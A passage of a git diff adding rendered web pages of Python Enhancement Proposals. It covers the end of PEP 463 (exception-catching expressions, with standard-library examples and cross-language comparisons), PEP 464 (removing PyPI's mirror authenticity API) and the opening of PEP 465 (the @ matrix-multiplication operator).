All four maintain left-to-right evaluation order: first the base expression, +then the exception list, and lastly the default. This is important, as the +expressions are evaluated lazily. By comparison, several of the ad-hoc +alternatives listed above must (by the nature of functions) evaluate their +default values eagerly. The preferred form, using the colon, parallels +try/except by using “except exception_list:”, and parallels lambda by having +“keyword name_list: subexpression”; it also can be read as mapping Exception +to the default value, dict-style. Using the arrow introduces a token many +programmers will not be familiar with, and which currently has no similar +meaning, but is otherwise quite readable. The English word “pass” has a +vaguely similar meaning (consider the common usage “pass by value/reference” +for function arguments), and “pass” is already a keyword, but as its meaning +is distinctly unrelated, this may cause confusion. Using “then” makes sense +in English, but this introduces a new keyword to the language - albeit one +not in common use, but a new keyword all the same.

+

Left to right evaluation order is extremely important to readability, as it +parallels the order most expressions are evaluated. Alternatives such as:

+
value = (expr except default if Exception)
+
+
+

break this, by first evaluating the two ends, and then coming to the middle; +while this may not seem terrible (as the exception list will usually be a +constant), it does add to the confusion when multiple clauses meet, either +with multiple except/if or with the existing if/else, or a combination. +Using the preferred order, subexpressions will always be evaluated from +left to right, no matter how the syntax is nested.

+

Keeping the existing notation, but shifting the mandatory parentheses, we +have the following suggestion:

+
value = expr except (Exception: default)
+value = expr except(Exception: default)
+
+
+

This is reminiscent of a function call, or a dict initializer. The colon +cannot be confused with introducing a suite, but on the other hand, the new +syntax guarantees lazy evaluation, which a dict does not. The potential +to reduce confusion is considered unjustified by the corresponding potential +to increase it.

+
+
+

Example usage

+

For each example, an approximately-equivalent statement form is given, +to show how the expression will be parsed. These are not always +strictly equivalent, but will accomplish the same purpose. It is NOT +safe for the interpreter to translate one into the other.

+

A number of these examples are taken directly from the Python standard +library, with file names and line numbers correct as of early Feb 2014. +Many of these patterns are extremely common.

+

Retrieve an argument, defaulting to None:

+
cond = (args[1] except IndexError: None)
+
+# Lib/pdb.py:803:
+try:
+    cond = args[1]
+except IndexError:
+    cond = None
+
+
+

Fetch information from the system if available:

+
pwd = (os.getcwd() except OSError: None)
+
+# Lib/tkinter/filedialog.py:210:
+try:
+    pwd = os.getcwd()
+except OSError:
+    pwd = None
+
+
+

Attempt a translation, falling back on the original:

+
e.widget = (self._nametowidget(W) except KeyError: W)
+
+# Lib/tkinter/__init__.py:1222:
+try:
+    e.widget = self._nametowidget(W)
+except KeyError:
+    e.widget = W
+
+
+

Read from an iterator, continuing with blank lines once it’s +exhausted:

+
line = (readline() except StopIteration: '')
+
+# Lib/lib2to3/pgen2/tokenize.py:370:
+try:
+    line = readline()
+except StopIteration:
+    line = ''
+
+
+

Retrieve platform-specific information (note the DRY improvement); +this particular example could be taken further, turning a series of +separate assignments into a single large dict initialization:

+
# sys.abiflags may not be defined on all platforms.
+_CONFIG_VARS['abiflags'] = (sys.abiflags except AttributeError: '')
+
+# Lib/sysconfig.py:529:
+try:
+    _CONFIG_VARS['abiflags'] = sys.abiflags
+except AttributeError:
+    # sys.abiflags may not be defined on all platforms.
+    _CONFIG_VARS['abiflags'] = ''
+
+
+

Retrieve an indexed item, defaulting to None (similar to dict.get):

+
def getNamedItem(self, name):
+    return (self._attrs[name] except KeyError: None)
+
+# Lib/xml/dom/minidom.py:573:
+def getNamedItem(self, name):
+    try:
+        return self._attrs[name]
+    except KeyError:
+        return None
+
+
+

Translate numbers to names, falling back on the numbers:

+
g = (grp.getgrnam(tarinfo.gname)[2] except KeyError: tarinfo.gid)
+u = (pwd.getpwnam(tarinfo.uname)[2] except KeyError: tarinfo.uid)
+
+# Lib/tarfile.py:2198:
+try:
+    g = grp.getgrnam(tarinfo.gname)[2]
+except KeyError:
+    g = tarinfo.gid
+try:
+    u = pwd.getpwnam(tarinfo.uname)[2]
+except KeyError:
+    u = tarinfo.uid
+
+
+

Look up an attribute, falling back on a default:

+
mode = (f.mode except AttributeError: 'rb')
+
+# Lib/aifc.py:882:
+if hasattr(f, 'mode'):
+    mode = f.mode
+else:
+    mode = 'rb'
+
+return (sys._getframe(1) except AttributeError: None)
+# Lib/inspect.py:1350:
+return sys._getframe(1) if hasattr(sys, "_getframe") else None
+
+
+

Perform some lengthy calculations in EAFP mode, handling division by +zero as a sort of sticky NaN:

+
value = (calculate(x) except ZeroDivisionError: float("nan"))
+
+try:
+    value = calculate(x)
+except ZeroDivisionError:
+    value = float("nan")
+
+
+

Calculate the mean of a series of numbers, falling back on zero:

+
value = (statistics.mean(lst) except statistics.StatisticsError: 0)
+
+try:
+    value = statistics.mean(lst)
+except statistics.StatisticsError:
+    value = 0
+
+
+

Looking up objects in a sparse list of overrides:

+
(overrides[x] or default except IndexError: default).ping()
+
+try:
+    (overrides[x] or default).ping()
+except IndexError:
+    default.ping()
+
+
+
+

Narrowing of exception-catching scope

+

The following examples, taken directly from Python’s standard library, +demonstrate how the scope of the try/except can be conveniently narrowed. +To do this with the statement form of try/except would require a temporary +variable, but it’s far cleaner as an expression.

+

Lib/ipaddress.py:343:

+
try:
+    ips.append(ip.ip)
+except AttributeError:
+    ips.append(ip.network_address)
+
+
+

Becomes:

+
ips.append(ip.ip except AttributeError: ip.network_address)
+
+
+

The expression form is nearly equivalent to this:

+
try:
+    _ = ip.ip
+except AttributeError:
+    _ = ip.network_address
+ips.append(_)
+
+
+

Lib/tempfile.py:130:

+
try:
+    dirlist.append(_os.getcwd())
+except (AttributeError, OSError):
+    dirlist.append(_os.curdir)
+
+
+

Becomes:

+
dirlist.append(_os.getcwd() except (AttributeError, OSError): _os.curdir)
+
+
+

Lib/asyncore.py:264:

+
try:
+    status.append('%s:%d' % self.addr)
+except TypeError:
+    status.append(repr(self.addr))
+
+
+

Becomes:

+
status.append('%s:%d' % self.addr except TypeError: repr(self.addr))
+
+
+

In each case, the narrowed scope of the try/except ensures that an unexpected +exception (for instance, AttributeError if “append” were misspelled) does not +get caught by the same handler. This is sufficiently unlikely to be reason +to break the call out into a separate line (as per the five line example +above), but it is a small benefit gained as a side-effect of the conversion.

+
+
+
+

Comparisons with other languages

+

(With thanks to Andrew Barnert for compiling this section. Note that the +examples given here do not reflect the current version of the proposal, +and need to be edited.)

+

Ruby’s “begin…rescue…rescue…else…ensure…end” is an expression +(potentially with statements inside it). It has the equivalent of an “as” +clause, and the equivalent of bare except. And it uses no punctuation or +keyword between the bare except/exception class/exception class with as +clause and the value. (And yes, it’s ambiguous unless you understand +Ruby’s statement/expression rules.)

+
x = begin computation() rescue MyException => e default(e) end;
+x = begin computation() rescue MyException default() end;
+x = begin computation() rescue default() end;
+x = begin computation() rescue MyException default() rescue OtherException other() end;
+
+
+

In terms of this PEP:

+
x = computation() except MyException as e default(e)
+x = computation() except MyException default(e)
+x = computation() except default(e)
+x = computation() except MyException default() except OtherException other()
+
+
+

Erlang has a try expression that looks like this

+
x = try computation() catch MyException:e -> default(e) end;
+x = try computation() catch MyException:e -> default(e); OtherException:e -> other(e) end;
+
+
+

The class and “as” name are mandatory, but you can use “_” for either. +There’s also an optional “when” guard on each, and a “throw” clause that +you can catch, which I won’t get into. To handle multiple exceptions, +you just separate the clauses with semicolons, which I guess would map +to commas in Python. So:

+
x = try computation() except MyException as e -> default(e)
+x = try computation() except MyException as e -> default(e), OtherException as e->other_default(e)
+
+
+

Erlang also has a “catch” expression, which, despite using the same keyword, +is completely different, and you don’t want to know about it.

+

The ML family has two different ways of dealing with this, “handle” and +“try”; the difference between the two is that “try” pattern-matches the +exception, which gives you the effect of multiple except clauses and as +clauses. In either form, the handler clause is punctuated by “=>” in +some dialects, “->” in others.

+

To avoid confusion, I’ll write the function calls in Python style.

+

Here’s SML’s “handle”

+
let x = computation() handle MyException => default();;
+
+
+

Here’s OCaml’s “try”

+
let x = try computation() with MyException explanation -> default(explanation);;
+
+let x = try computation() with
+
+    MyException(e) -> default(e)
+  | MyOtherException() -> other_default()
+  | (e) -> fallback(e);;
+
+
+

In terms of this PEP, these would be something like:

+
x = computation() except MyException => default()
+x = try computation() except MyException e -> default()
+x = (try computation()
+     except MyException as e -> default(e)
+     except MyOtherException -> other_default()
+     except BaseException as e -> fallback(e))
+
+
+

Many ML-inspired but not-directly-related languages from academia mix things +up, usually using more keywords and fewer symbols. So, the Oz would map +to Python as

+
x = try computation() catch MyException as e then default(e)
+
+
+

Many Lisp-derived languages, like Clojure, implement try/catch as special +forms (if you don’t know what that means, think function-like macros), so you +write, effectively

+
try(computation(), catch(MyException, explanation, default(explanation)))
+
+try(computation(),
+    catch(MyException, explanation, default(explanation)),
+    catch(MyOtherException, explanation, other_default(explanation)))
+
+
+

In Common Lisp, this is done with a slightly clunkier “handler-case” macro, +but the basic idea is the same.

+

The Lisp style is, surprisingly, used by some languages that don’t have +macros, like Lua, where xpcall takes functions. Writing lambdas +Python-style instead of Lua-style

+
x = xpcall(lambda: expression(), lambda e: default(e))
+
+
+

This actually returns (true, expression()) or (false, default(e)), but I think we can ignore that part.

+

Haskell is actually similar to Lua here (except that it’s all done +with monads, of course):

+
x = do catch(lambda: expression(), lambda e: default(e))
+
+
+

You can write a pattern matching expression within the function to decide +what to do with it; catching and re-raising exceptions you don’t want is +cheap enough to be idiomatic.

+

But Haskell infixing makes this nicer:

+
x = do expression() `catch` lambda: default()
+x = do expression() `catch` lambda e: default(e)
+
+
+

And that makes the parallel between the lambda colon and the except +colon in the proposal much more obvious:

+
x = expression() except Exception: default()
+x = expression() except Exception as e: default(e)
+
+
+

Tcl has the other half of Lua’s xpcall; catch is a function which returns +true if an exception was caught, false otherwise, and you get the value out +in other ways. And it’s all built around the implicit quote-and-exec +that everything in Tcl is based on, making it even harder to describe in +Python terms than Lisp macros, but something like

+
if {[ catch("computation()") "explanation"]} { default(explanation) }
+
+
+

Smalltalk is also somewhat hard to map to Python. The basic version +would be

+
x := computation() on:MyException do:default()
+
+
+

… but that’s basically Smalltalk’s passing-arguments-with-colons +syntax, not its exception-handling syntax.

+
+
+

Deferred sub-proposals

+
+

Multiple except clauses

+

An examination of use-cases shows that this is not needed as often as +it would be with the statement form, and as its syntax is a point on +which consensus has not been reached, the entire feature is deferred.

+

Multiple ‘except’ keywords could be used, and they will all catch +exceptions raised in the original expression (only):

+
# Will catch any of the listed exceptions thrown by expr;
+# any exception thrown by a default expression will propagate.
+value = (expr
+    except Exception1: default1
+    except Exception2: default2
+    # ... except ExceptionN: defaultN
+)
+
+
+

Currently, one of the following forms must be used:

+
# Will catch an Exception2 thrown by either expr or default1
+value = (
+    (expr except Exception1: default1)
+    except Exception2: default2
+)
+# Will catch an Exception2 thrown by default1 only
+value = (expr except Exception1:
+    (default1 except Exception2: default2)
+)
+
+
+

Listing multiple exception clauses without parentheses is a syntax error +(see above), and so a future version of Python is free to add this feature +without breaking any existing code.

+
+
+

Capturing the exception object

+

In a try/except block, the use of ‘as’ to capture the exception object +creates a local name binding, and implicitly deletes that binding (to +avoid creating a reference loop) in a finally clause. In an expression +context, this makes little sense, and a proper sub-scope would be +required to safely capture the exception object - something akin to the +way a list comprehension is handled. However, CPython currently +implements a comprehension’s subscope with a nested function call, which +has consequences in some contexts such as class definitions, and is +therefore unsuitable for this proposal. Should there be, in future, a +way to create a true subscope (which could simplify comprehensions, +except expressions, with blocks, and possibly more), then this proposal +could be revived; until then, its loss is not a great one, as the simple +exception handling that is well suited to the expression notation used +here is generally concerned only with the type of the exception, and not +its value - further analysis below.

+

This syntax would, admittedly, allow a convenient way to capture +exceptions in interactive Python; returned values are captured by “_”, +but exceptions currently are not. This could be spelled:

+
>>> (expr except Exception as e: e)
+
+
+

An examination of the Python standard library shows that, while the use +of ‘as’ is fairly common (occurring in roughly one except clause in five), +it is extremely uncommon in the cases which could logically be converted +into the expression form. Its few uses can simply be left unchanged. +Consequently, in the interests of simplicity, the ‘as’ clause is not +included in this proposal. A subsequent Python version can add this without +breaking any existing code, as ‘as’ is already a keyword.

+

One example where this could possibly be useful is Lib/imaplib.py:568:

+
try: typ, dat = self._simple_command('LOGOUT')
+except: typ, dat = 'NO', ['%s: %s' % sys.exc_info()[:2]]
+
+
+

This could become:

+
typ, dat = (self._simple_command('LOGOUT')
+    except BaseException as e: ('NO', '%s: %s' % (type(e), e)))
+
+
+

Or perhaps some other variation. This is hardly the most compelling use-case, +but an intelligent look at this code could tidy it up significantly. In the +absence of further examples showing any need of the exception object, I have +opted to defer indefinitely the recommendation.

+
+
+
+

Rejected sub-proposals

+
+

finally clause

+

The statement form try… finally or try… except… finally has no +logical corresponding expression form. Therefore, the finally keyword +is not a part of this proposal, in any way.

+
+
+

Bare except having different meaning

+

With several of the proposed syntaxes, omitting the exception type name +would be easy and concise, and would be tempting. For convenience’s sake, +it might be advantageous to have a bare ‘except’ clause mean something +more useful than “except BaseException”. Proposals included having it +catch Exception, or some specific set of “common exceptions” (subclasses +of a new type called ExpressionError), or have it look for a tuple named +ExpressionError in the current scope, with a built-in default such as +(ValueError, UnicodeError, AttributeError, EOFError, IOError, OSError, +LookupError, NameError, ZeroDivisionError). All of these were rejected, +for several reasons.

+
    +
  • First and foremost, consistency with the statement form of try/except +would be broken. Just as a list comprehension or ternary if expression +can be explained by “breaking it out” into its vertical statement form, +an expression-except should be able to be explained by a relatively +mechanical translation into a near-equivalent statement. Any form of +syntax common to both should therefore have the same semantics in each, +and above all should not have the subtle difference of catching more in +one than the other, as it will tend to attract unnoticed bugs.
  • +
  • Secondly, the set of appropriate exceptions to catch would itself be +a huge point of contention. It would be impossible to predict exactly +which exceptions would “make sense” to be caught; why bless some of them +with convenient syntax and not others?
  • +
  • And finally (this partly because the recommendation was that a bare +except should be actively encouraged, once it was reduced to a “reasonable” +set of exceptions), any situation where you catch an exception you don’t +expect to catch is an unnecessary bug magnet.
  • +
+

Consequently, the use of a bare ‘except’ is down to two possibilities: +either it is syntactically forbidden in the expression form, or it is +permitted with the exact same semantics as in the statement form (namely, +that it catch BaseException and be unable to capture it with ‘as’).

+
+
+

Bare except clauses

+

PEP 8 rightly advises against the use of a bare ‘except’. While it is +syntactically legal in a statement, and for backward compatibility must +remain so, there is little value in encouraging its use. In an expression +except clause, “except:” is a SyntaxError; use the equivalent long-hand +form “except BaseException:” instead. A future version of Python MAY choose +to reinstate this, which can be done without breaking compatibility.

+
+
+

Parentheses around the except clauses

+

Should it be legal to parenthesize the except clauses, separately from +the expression that could raise? Example:

+
value = expr (
+    except Exception1 [as e]: default1
+    except Exception2 [as e]: default2
+    # ... except ExceptionN [as e]: defaultN
+)
+
+
+

This is more compelling when one or both of the deferred sub-proposals +of multiple except clauses and/or exception capturing is included. In +their absence, the parentheses would be thus:

+
value = expr except ExceptionType: default
+value = expr (except ExceptionType: default)
+
+
+

The advantage is minimal, and the potential to confuse a reader into +thinking the except clause is separate from the expression, or into thinking +this is a function call, makes this non-compelling. The expression can, of +course, be parenthesized if desired, as can the default:

+
value = (expr) except ExceptionType: (default)
+
+
+

As the entire expression is now required to be in parentheses (which had not +been decided at the time when this was debated), there is less need to +delineate this section, and in many cases it would be redundant.

+
+
+

Short-hand for “except: pass”

+

The following was been suggested as a similar +short-hand, though not technically an expression:

+
statement except Exception: pass
+
+try:
+    statement
+except Exception:
+    pass
+
+
+

For instance, a common use-case is attempting the removal of a file:

+
os.unlink(some_file) except OSError: pass
+
+
+

There is an equivalent already in Python 3.4, however, in contextlib:

+
from contextlib import suppress
+with suppress(OSError): os.unlink(some_file)
+
+
+

As this is already a single line (or two with a break after the colon), +there is little need of new syntax and a confusion of statement vs +expression to achieve this.

+
+
+
+

Common objections

+
+

Colons always introduce suites

+

While it is true that many of Python’s syntactic elements use the colon to +introduce a statement suite (if, while, with, for, etcetera), this is not +by any means the sole use of the colon. Currently, Python syntax includes +four cases where a colon introduces a subexpression:

+
    +
  • dict display - { … key:value … }
  • +
  • slice notation - [start:stop:step]
  • +
  • function definition - parameter : annotation
  • +
  • lambda - arg list: return value
  • +
+

This proposal simply adds a fifth:

+
    +
  • except-expression - exception list: result
  • +
+

Style guides and PEP 8 should recommend not having the colon at the end of +a wrapped line, which could potentially look like the introduction of a +suite, but instead advocate wrapping before the exception list, keeping the +colon clearly between two expressions.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0463.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0464/index.html b/pep-0464/index.html new file mode 100644 index 00000000000..62df51996af --- /dev/null +++ b/pep-0464/index.html @@ -0,0 +1,188 @@ + + + + + + + + PEP 464 – Removal of the PyPI Mirror Authenticity API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 464 – Removal of the PyPI Mirror Authenticity API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
02-Mar-2014
+
Post-History:
+
04-Mar-2014
+
Replaces:
+
381
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the deprecation and removal of the PyPI Mirror Authenticity +API, this includes the /serverkey URL and all of the URLs under /serversig.

+
+
+

Rationale

+

The PyPI mirroring infrastructure (defined in PEP 381) provides a means to +mirror the content of PyPI used by the automatic installers, and as a component +of that, it provides a method for verifying the authenticity of the mirrored +content.

+

This PEP proposes the removal of this API due to:

+
    +
  • There are no known implementations that utilize this API, this includes +pip and +setuptools.
  • +
  • Because this API uses DSA it is vulnerable to leaking the private key if +there is any bias in the random nonce.
  • +
  • This API solves one small corner of the trust problem, however the problem +itself is much larger and it would be better to have a fully fledged system, +such as The Update Framework, +instead.
  • +
+

Due to the issues it has and the lack of use it is the opinion of this PEP +that it does not provide any practical benefit to justify the additional +complexity.

+
+
+

Plan for Deprecation & Removal

+

Immediately upon the acceptance of this PEP the Mirror Authenticity API will +be considered deprecated and mirroring agents and installation tools should +stop accessing it.

+

Instead of actually removing it from the current code base (PyPI 1.0) the +current work to replace PyPI 1.0 with a new code base (PyPI 2.0) will simply +not implement this API. This would cause the API to be “removed” when the +switch from 1.0 to 2.0 occurs.

+

If PyPI 2.0 has not been deployed in place of PyPI 1.0 by Sept 01 2014 then +this PEP will be implemented in the PyPI 1.0 code base instead (by removing +the associated code).

+

No changes will be required in the installers, however PEP 381 compliant +mirroring clients, such as +bandersnatch and +pep381client will need to be +updated to no longer attempt to mirror the /serversig URLs.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0464.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0465/index.html b/pep-0465/index.html new file mode 100644 index 00000000000..4387d2d8847 --- /dev/null +++ b/pep-0465/index.html @@ -0,0 +1,1434 @@ + + + + + + + + PEP 465 – A dedicated infix operator for matrix multiplication | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 465 – A dedicated infix operator for matrix multiplication

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Feb-2014
+
Python-Version:
+
3.5
+
Post-History:
+
13-Mar-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new binary operator to be used for matrix +multiplication, called @. (Mnemonic: @ is * for +mATrices.)

+
+
+

Specification

+

A new binary operator is added to the Python language, together +with the corresponding in-place version:

+ + + + + + + + + + + + + + + + + +
OpPrecedence/associativityMethods
@Same as *__matmul__, __rmatmul__
@=n/a__imatmul__
+

No implementations of these methods are added to the builtin or +standard library types. However, a number of projects have reached +consensus on the recommended semantics for these operations; see +Intended usage details below for details.

+

For details on how this operator will be implemented in CPython, see +Implementation details.

+
+
+

Motivation

+
+

Executive summary

+

In numerical code, there are two important operations which compete +for use of Python’s * operator: elementwise multiplication, and +matrix multiplication. In the nearly twenty years since the Numeric +library was first proposed, there have been many attempts to resolve +this tension [13]; none have been really satisfactory. +Currently, most numerical Python code uses * for elementwise +multiplication, and function/method syntax for matrix multiplication; +however, this leads to ugly and unreadable code in common +circumstances. The problem is bad enough that significant amounts of +code continue to use the opposite convention (which has the virtue of +producing ugly and unreadable code in different circumstances), and +this API fragmentation across codebases then creates yet more +problems. There does not seem to be any good solution to the +problem of designing a numerical API within current Python syntax – +only a landscape of options that are bad in different ways. The +minimal change to Python syntax which is sufficient to resolve these +problems is the addition of a single new infix operator for matrix +multiplication.

+

Matrix multiplication has a singular combination of features which +distinguish it from other binary operations, which together provide a +uniquely compelling case for the addition of a dedicated infix +operator:

+
    +
  • Just as for the existing numerical operators, there exists a vast +body of prior art supporting the use of infix notation for matrix +multiplication across all fields of mathematics, science, and +engineering; @ harmoniously fills a hole in Python’s existing +operator system.
  • +
  • @ greatly clarifies real-world code.
  • +
  • @ provides a smoother onramp for less experienced users, who are +particularly harmed by hard-to-read code and API fragmentation.
  • +
  • @ benefits a substantial and growing portion of the Python user +community.
  • +
  • @ will be used frequently – in fact, evidence suggests it may +be used more frequently than // or the bitwise operators.
  • +
  • @ allows the Python numerical community to reduce fragmentation, +and finally standardize on a single consensus duck type for all +numerical array objects.
  • +
+
+
+

Background: What’s wrong with the status quo?

+

When we crunch numbers on a computer, we usually have lots and lots of +numbers to deal with. Trying to deal with them one at a time is +cumbersome and slow – especially when using an interpreted language. +Instead, we want the ability to write down simple operations that +apply to large collections of numbers all at once. The n-dimensional +array is the basic object that all popular numeric computing +environments use to make this possible. Python has several libraries +that provide such arrays, with numpy being at present the most +prominent.

+

When working with n-dimensional arrays, there are two different ways +we might want to define multiplication. One is elementwise +multiplication:

+
[[1, 2],     [[11, 12],     [[1 * 11, 2 * 12],
+ [3, 4]]  x   [13, 14]]  =   [3 * 13, 4 * 14]]
+
+
+

and the other is matrix multiplication:

+
[[1, 2],     [[11, 12],     [[1 * 11 + 2 * 13, 1 * 12 + 2 * 14],
+ [3, 4]]  x   [13, 14]]  =   [3 * 11 + 4 * 13, 3 * 12 + 4 * 14]]
+
+
+

Elementwise multiplication is useful because it lets us easily and +quickly perform many multiplications on a large collection of values, +without writing a slow and cumbersome for loop. And this works as +part of a very general schema: when using the array objects provided +by numpy or other numerical libraries, all Python operators work +elementwise on arrays of all dimensionalities. The result is that one +can write functions using straightforward code like a * b + c / d, +treating the variables as if they were simple values, but then +immediately use this function to efficiently perform this calculation +on large collections of values, while keeping them organized using +whatever arbitrarily complex array layout works best for the problem +at hand.

+

Matrix multiplication is more of a special case. It’s only defined on +2d arrays (also known as “matrices”), and multiplication is the only +operation that has an important “matrix” version – “matrix addition” +is the same as elementwise addition; there is no such thing as “matrix +bitwise-or” or “matrix floordiv”; “matrix division” and “matrix +to-the-power-of” can be defined but are not very useful, etc. +However, matrix multiplication is still used very heavily across all +numerical application areas; mathematically, it’s one of the most +fundamental operations there is.

+

Because Python syntax currently allows for only a single +multiplication operator *, libraries providing array-like objects +must decide: either use * for elementwise multiplication, or use +* for matrix multiplication. And, unfortunately, it turns out +that when doing general-purpose number crunching, both operations are +used frequently, and there are major advantages to using infix rather +than function call syntax in both cases. Thus it is not at all clear +which convention is optimal, or even acceptable; often it varies on a +case-by-case basis.

+

Nonetheless, network effects mean that it is very important that we +pick just one convention. In numpy, for example, it is technically +possible to switch between the conventions, because numpy provides two +different types with different __mul__ methods. For +numpy.ndarray objects, * performs elementwise multiplication, +and matrix multiplication must use a function call (numpy.dot). +For numpy.matrix objects, * performs matrix multiplication, +and elementwise multiplication requires function syntax. Writing code +using numpy.ndarray works fine. Writing code using +numpy.matrix also works fine. But trouble begins as soon as we +try to integrate these two pieces of code together. Code that expects +an ndarray and gets a matrix, or vice-versa, may crash or +return incorrect results. Keeping track of which functions expect +which types as inputs, and return which types as outputs, and then +converting back and forth all the time, is incredibly cumbersome and +impossible to get right at any scale. Functions that defensively try +to handle both types as input and DTRT, find themselves floundering +into a swamp of isinstance and if statements.

+

PEP 238 split / into two operators: / and //. Imagine the +chaos that would have resulted if it had instead split int into +two types: classic_int, whose __div__ implemented floor +division, and new_int, whose __div__ implemented true +division. This, in a more limited way, is the situation that Python +number-crunchers currently find themselves in.

+

In practice, the vast majority of projects have settled on the +convention of using * for elementwise multiplication, and function +call syntax for matrix multiplication (e.g., using numpy.ndarray +instead of numpy.matrix). This reduces the problems caused by API +fragmentation, but it doesn’t eliminate them. The strong desire to +use infix notation for matrix multiplication has caused a number of +specialized array libraries to continue to use the opposing convention +(e.g., scipy.sparse, pyoperators, pyviennacl) despite the problems +this causes, and numpy.matrix itself still gets used in +introductory programming courses, often appears in StackOverflow +answers, and so forth. Well-written libraries thus must continue to +be prepared to deal with both types of objects, and, of course, are +also stuck using unpleasant funcall syntax for matrix multiplication. +After nearly two decades of trying, the numerical community has still +not found any way to resolve these problems within the constraints of +current Python syntax (see Rejected alternatives to adding a new +operator below).

+

This PEP proposes the minimum effective change to Python syntax that +will allow us to drain this swamp. It splits * into two +operators, just as was done for /: * for elementwise +multiplication, and @ for matrix multiplication. (Why not the +reverse? Because this way is compatible with the existing consensus, +and because it gives us a consistent rule that all the built-in +numeric operators also apply in an elementwise manner to arrays; the +reverse convention would lead to more special cases.)

+

So that’s why matrix multiplication doesn’t and can’t just use *. +Now, in the rest of this section, we’ll explain why it nonetheless +meets the high bar for adding a new operator.

+
+
+

Why should matrix multiplication be infix?

+

Right now, most numerical code in Python uses syntax like +numpy.dot(a, b) or a.dot(b) to perform matrix multiplication. +This obviously works, so why do people make such a fuss about it, even +to the point of creating API fragmentation and compatibility swamps?

+

Matrix multiplication shares two features with ordinary arithmetic +operations like addition and multiplication on numbers: (a) it is used +very heavily in numerical programs – often multiple times per line of +code – and (b) it has an ancient and universally adopted tradition of +being written using infix syntax. This is because, for typical +formulas, this notation is dramatically more readable than any +function call syntax. Here’s an example to demonstrate:

+

One of the most useful tools for testing a statistical hypothesis is +the linear hypothesis test for OLS regression models. It doesn’t +really matter what all those words I just said mean; if we find +ourselves having to implement this thing, what we’ll do is look up +some textbook or paper on it, and encounter many mathematical formulas +that look like:

+
+S = (Hβ − r)T(HVHT) − 1(Hβ − r) +
+

Here the various variables are all vectors or matrices (details for +the curious: [5]).

+

Now we need to write code to perform this calculation. In current +numpy, matrix multiplication can be performed using either the +function or method call syntax. Neither provides a particularly +readable translation of the formula:

+
import numpy as np
+from numpy.linalg import inv, solve
+
+# Using dot function:
+S = np.dot((np.dot(H, beta) - r).T,
+           np.dot(inv(np.dot(np.dot(H, V), H.T)), np.dot(H, beta) - r))
+
+# Using dot method:
+S = (H.dot(beta) - r).T.dot(inv(H.dot(V).dot(H.T))).dot(H.dot(beta) - r)
+
+
+

With the @ operator, the direct translation of the above formula +becomes:

+
S = (H @ beta - r).T @ inv(H @ V @ H.T) @ (H @ beta - r)
+
+
+

Notice that there is now a transparent, 1-to-1 mapping between the +symbols in the original formula and the code that implements it.

+

Of course, an experienced programmer will probably notice that this is +not the best way to compute this expression. The repeated computation +of Hβ − r should perhaps be factored out; and, +expressions of the form dot(inv(A), B) should almost always be +replaced by the more numerically stable solve(A, B). When using +@, performing these two refactorings gives us:

+
# Version 1 (as above)
+S = (H @ beta - r).T @ inv(H @ V @ H.T) @ (H @ beta - r)
+
+# Version 2
+trans_coef = H @ beta - r
+S = trans_coef.T @ inv(H @ V @ H.T) @ trans_coef
+
+# Version 3
+S = trans_coef.T @ solve(H @ V @ H.T, trans_coef)
+
+
+

Notice that when comparing between each pair of steps, it’s very easy +to see exactly what was changed. If we apply the equivalent +transformations to the code using the .dot method, then the changes +are much harder to read out or verify for correctness:

+
# Version 1 (as above)
+S = (H.dot(beta) - r).T.dot(inv(H.dot(V).dot(H.T))).dot(H.dot(beta) - r)
+
+# Version 2
+trans_coef = H.dot(beta) - r
+S = trans_coef.T.dot(inv(H.dot(V).dot(H.T))).dot(trans_coef)
+
+# Version 3
+S = trans_coef.T.dot(solve(H.dot(V).dot(H.T)), trans_coef)
+
+
+

Readability counts! The statements using @ are shorter, contain +more whitespace, can be directly and easily compared both to each +other and to the textbook formula, and contain only meaningful +parentheses. This last point is particularly important for +readability: when using function-call syntax, the required parentheses +on every operation create visual clutter that makes it very difficult +to parse out the overall structure of the formula by eye, even for a +relatively simple formula like this one. Eyes are terrible at parsing +non-regular languages. I made and caught many errors while trying to +write out the ‘dot’ formulas above. I know they still contain at +least one error, maybe more. (Exercise: find it. Or them.) The +@ examples, by contrast, are not only correct, they’re obviously +correct at a glance.

+

If we are even more sophisticated programmers, and writing code that +we expect to be reused, then considerations of speed or numerical +accuracy might lead us to prefer some particular order of evaluation. +Because @ makes it possible to omit irrelevant parentheses, we can +be certain that if we do write something like (H @ V) @ H.T, +then our readers will know that the parentheses must have been added +intentionally to accomplish some meaningful purpose. In the dot +examples, it’s impossible to know which nesting decisions are +important, and which are arbitrary.

+

Infix @ dramatically improves matrix code usability at all stages +of programmer interaction.

+
+
+

Transparent syntax is especially crucial for non-expert programmers

+

A large proportion of scientific code is written by people who are +experts in their domain, but are not experts in programming. And +there are many university courses run each year with titles like “Data +analysis for social scientists” which assume no programming +background, and teach some combination of mathematical techniques, +introduction to programming, and the use of programming to implement +these mathematical techniques, all within a 10-15 week period. These +courses are more and more often being taught in Python rather than +special-purpose languages like R or Matlab.

+

